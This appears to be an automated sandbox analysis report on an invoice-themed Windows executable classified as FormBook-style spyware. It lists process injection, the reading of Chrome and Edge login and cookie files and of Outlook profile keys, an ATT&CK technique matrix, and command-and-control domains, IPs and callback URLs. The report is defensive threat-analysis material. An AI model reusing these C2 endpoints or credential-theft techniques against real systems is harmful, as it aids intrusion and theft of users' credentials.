            Source: C:\Windows\SysWOW64\setupugc.exeThread APC queued: target process: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeJump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 27D3008Jump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
            Source: C:\Users\user\Desktop\NEW INVOICE.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEW INVOICE.exe"Jump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeProcess created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
            Source: iLyDwpUmDRByL.exe, 00000004.00000002.3880214961.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000004.00000000.2324365408.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000006.00000002.3880320367.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: NEW INVOICE.exe, iLyDwpUmDRByL.exe, 00000004.00000002.3880214961.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000004.00000000.2324365408.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000006.00000002.3880320367.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: iLyDwpUmDRByL.exe, 00000004.00000002.3880214961.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000004.00000000.2324365408.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000006.00000002.3880320367.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: NEW INVOICE.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: iLyDwpUmDRByL.exe, 00000004.00000002.3880214961.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000004.00000000.2324365408.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000006.00000002.3880320367.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2398520364.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3879199924.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2398092266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3879108456.0000000002950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2399026834.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3882462274.0000000005240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3878504026.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3880668788.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: NEW INVOICE.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
            Source: NEW INVOICE.exeBinary or memory string: WIN_XP
            Source: NEW INVOICE.exeBinary or memory string: WIN_XPe
            Source: NEW INVOICE.exeBinary or memory string: WIN_VISTA
            Source: NEW INVOICE.exeBinary or memory string: WIN_7

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2398520364.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3879199924.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2398092266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3879108456.0000000002950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2399026834.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3882462274.0000000005240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3878504026.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3880668788.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            1
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS116
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets241
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528057 Sample: NEW INVOICE.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 28 yesonkoicasino.net 2->28 30 www.yesonkoicasino.net 2->30 32 14 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 6 other signatures 2->48 10 NEW INVOICE.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 13 svchost.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 iLyDwpUmDRByL.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 setupugc.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 iLyDwpUmDRByL.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.dbold.top 209.74.64.190, 50003, 50004, 50005 MULTIBAND-NEWHOPEUS United States 22->34 36 www.983743.vin 45.150.55.15, 49976, 49979, 49980 M247GB Japan 22->36 38 5 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            NEW INVOICE.exe24%ReversingLabs
            NEW INVOICE.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            07t90q.vip
            3.33.130.190
            truetrue
              unknown
              www.cctv9.rest
              114.134.188.182
              truetrue
                unknown
                www.aed.shopping
                35.214.185.243
                truetrue
                  unknown
                  www.983743.vin
                  45.150.55.15
                  truetrue
                    unknown
                    stratogent.info
                    76.223.105.230
                    truetrue
                      unknown
                      arcare.partners
                      3.33.130.190
                      truetrue
                        unknown
                        www.hpb5spjmad.buzz
                        206.238.91.127
                        truetrue
                          unknown
                          www.dbold.top
                          209.74.64.190
                          truetrue
                            unknown
                            yesonkoicasino.net
                            3.33.130.190
                            truetrue
                              unknown
                              cricketinsights.info
                              118.139.176.2
                              truetrue
                                unknown
                                www.diterra.shop
                                unknown
                                unknowntrue
                                  unknown
                                  www.07t90q.vip
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.cricketinsights.info
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.arcare.partners
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.yesonkoicasino.net
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.stratogent.info
                                          unknown
                                          unknowntrue
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.cctv9.rest/n990/?v2x4if=GxIYSLz2GkLjPqt/rHopn9WrO9y33v8yD5l3ZEVwbM0FZ2j7mw+4XotPwvAai7FT8Vl9/yJfFwWFKgVG3tpm2nD6ueTLwdPoo/Wta03Cu/cEpPnD/hpbWd7xqCAhgBSZNQ==&bTU8=BDEpwP48zFO0YTLtrue
                                              unknown
                                              http://www.07t90q.vip/cyr7/?v2x4if=Vj4d5vaEXsFuB8fEcLmrU2eSD43jNQA/5S+cpwa+Zl1KtdnsFYOpBvNJOVDgu9PAnTJmhhfW0UddtTnseo1uNxsgVMS/H7YloLAZNbDtj8sD0y9kdjlRL77hQz9vNymozA==&bTU8=BDEpwP48zFO0YTLtrue
                                                unknown
                                                http://www.arcare.partners/6deb/?bTU8=BDEpwP48zFO0YTL&v2x4if=frbZRuXmKU61niiN8d5+MgPC6Pfs/vAzOJxU/pKZoFND5OO3a5aIko3iRqTcSjrrqUfDpbGVv4TG7n3U9jbk61XITHwlKVRh/+b6X5sz4nwuxRz0po2o/GoElcEwj6ZdbQ==true
                                                  unknown
                                                  http://www.hpb5spjmad.buzz/ms92/true
                                                    unknown
                                                    http://www.hpb5spjmad.buzz/ms92/?v2x4if=n8dDXvAJzlUA6O6FnjGVBJIJvgZrOKbtAkr4DdUmwdjfrfZifRy06AIZkxbgl7NZdYzWyf+P5ib5INIFgNORIa1dMQY3kp3ISeG94e9yVPy6MxUyIGQp/U8X9iEsYtM0zA==&bTU8=BDEpwP48zFO0YTLtrue
                                                      unknown
                                                      http://www.983743.vin/hi08/true
                                                        unknown
                                                        http://www.yesonkoicasino.net/au3y/?v2x4if=BGHhcy5EGJH3TGsr0SdAyB/IY0TJfM6b0Iyf+x5ct/zMbQAi/VOw0CHGLkWqXJ1uj5ygw+VfiH3h5t6lg/ZXmjp4gFIYwdA6QsklqXxg8umNXWH5XR+T10UE2xCqQBbuLw==&bTU8=BDEpwP48zFO0YTLtrue
                                                          unknown
                                                          http://www.arcare.partners/6deb/true
                                                            unknown
                                                            http://www.aed.shopping/aee4/?v2x4if=ES5FzaFcHZl881dcPkloWrtYSs+NgVQDIMJFF9px4VCQZC+r8qI7xcKZuwQNqR19d0uyEXBGxed8FJi2lm9yYZ1OZE63+Pgn8NmZa2sjPIuJKsbkgLcIIc7eVTKhMDO8Pg==&bTU8=BDEpwP48zFO0YTLtrue
                                                              unknown
                                                              http://www.stratogent.info/1c49/true
                                                                unknown
                                                                http://www.cctv9.rest/n990/true
                                                                  unknown
                                                                  http://www.983743.vin/hi08/?v2x4if=+COrnfoiLIYpHID8Jdn5STS8mn+dG0IOSj3c7V4IL3MTuwRxXjxT14sXhAjF0/r/wZdWh4U9LEdUgjY8Z9goLxBnq4opY1y2hZAtwcDdsNM1Zv/DVnaDD1dNLgPD6a//aQ==&bTU8=BDEpwP48zFO0YTLtrue
                                                                    unknown
                                                                    http://www.dbold.top/akfs/true
                                                                      unknown
                                                                      http://www.07t90q.vip/cyr7/true
                                                                        unknown
                                                                        http://www.stratogent.info/1c49/?v2x4if=WckH/SqvT3kS7RHLNOlxiQ21wOxfNt38tZjSQddzpQSzD2qOP8gJzvFEgzI5dIMVlIsEuBKIXf3X3jGZEF/onz6UCD5x8CZk1xGCCmMlAa+hgJB6DGnTg2zkdlj6iSBSfg==&bTU8=BDEpwP48zFO0YTLtrue
                                                                          unknown
                                                                          http://www.yesonkoicasino.net/au3y/true
                                                                            unknown
                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                            https://duckduckgo.com/chrome_newtabsetupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://duckduckgo.com/ac/?q=setupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=setupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=setupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://www.ecosia.org/newtab/setupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://ac.ecosia.org/autocomplete?q=setupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://aed.shopping/aee4/?v2x4if=ES5FzaFcHZl881dcPkloWrtYSssetupugc.exe, 00000005.00000002.3882121944.0000000003704000.00000004.10000000.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000006.00000002.3880894986.00000000031F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2691444690.000000002B2F4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://www.yesonkoicasino.netiLyDwpUmDRByL.exe, 00000006.00000002.3882462274.00000000052A0000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://stratogent.info/1c49/?v2x4if=WckH/SqvT3kS7RHLNOlxiQ21wOxfNt38tZjSQddzpQSzD2qOP8gJzvFEgzI5dIMsetupugc.exe, 00000005.00000002.3882121944.0000000003EDE000.00000004.10000000.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000006.00000002.3880894986.00000000039CE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsetupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=setupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  114.134.188.182
                                                                                  www.cctv9.restCambodia
                                                                                  45429CST-AS-APCAMBODIANSINGMENGTELEMEDIACOLTDKHtrue
                                                                                  45.150.55.15
                                                                                  www.983743.vinJapan9009M247GBtrue
                                                                                  76.223.105.230
                                                                                  stratogent.infoUnited States
                                                                                  16509AMAZON-02UStrue
                                                                                  206.238.91.127
                                                                                  www.hpb5spjmad.buzzUnited States
                                                                                  174COGENT-174UStrue
                                                                                  209.74.64.190
                                                                                  www.dbold.topUnited States
                                                                                  31744MULTIBAND-NEWHOPEUStrue
                                                                                  3.33.130.190
                                                                                  07t90q.vipUnited States
                                                                                  8987AMAZONEXPANSIONGBtrue
                                                                                  35.214.185.243
                                                                                  www.aed.shoppingUnited States
                                                                                  19527GOOGLE-2UStrue
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1528057
                                                                                  Start date and time:2024-10-07 15:03:30 +02:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 9m 0s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Run name:Run with higher sleep bypass
                                                                                  Number of analysed new started processes analysed:7
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:2
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:NEW INVOICE.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@11/7
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 75%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 90%
                                                                                  • Number of executed functions: 40
                                                                                  • Number of non-executed functions: 317
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • VT rate limit hit for: NEW INVOICE.exe
                                                                                  TimeTypeDescription
                                                                                  09:05:33API Interceptor5972424x Sleep call for process: setupugc.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  114.134.188.182shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.cctv9.rest/s7c9/
                                                                                  76.223.105.230SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.stratogent.info/f3n5/
                                                                                  Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.wearenotgoingback.info/cjvv/?EZ2lo=4S8XY8l3MvvMOMyL3KrDz8kPPAGqnGng5tYYPWDdvWcwX33CgHNrDDjfFme/uWZ2yYnPkPJRTtnUR7GmwOpWBkY/43NiHjgDg3aX97mZZ8znKIfN0Q==&7NP=7FXXUPl
                                                                                  TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.beauinthedark.net/bopi/?0T5=UL08qvZHLtV&EnAHS=ehvyC7UB7hPuNgJOlic60RckWGiOc4a88OD9LEjvmuzDnOCQ0tva4reQ7SFxdnJvODYI
                                                                                  http://cloudsharehubs.comGet hashmaliciousHTMLPhisherBrowse
                                                                                  • cloudsharehubs.com/
                                                                                  Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.wearenotgoingback.info/p273/
